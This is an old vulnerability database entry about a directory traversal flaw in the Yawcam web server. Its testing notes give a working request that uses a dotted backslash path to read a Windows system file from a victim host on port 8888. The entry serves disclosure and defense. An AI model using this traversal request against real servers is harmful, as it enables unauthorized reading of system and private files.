Yawcam Web Server Traversal Arbitrary File Access

2005-04-21T01:39:00
ID OSVDB:15732
Type osvdb
Reporter OSVDB
Modified 2005-04-21T01:39:00

Description

Manual Testing Notes

telnet [victim] 8888 GET ................\windows\system.ini HTTP/1.0 GET ................\windows\system.ini HTTP/1.0

References:

Vendor URL: http://www.yawcam.com/ Security Tracker: 1013781 Secunia Advisory ID:15052 Other Advisory URL: http://www.autistici.org/fdonato/advisory/Yawcam0.2.5-adv.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0472.html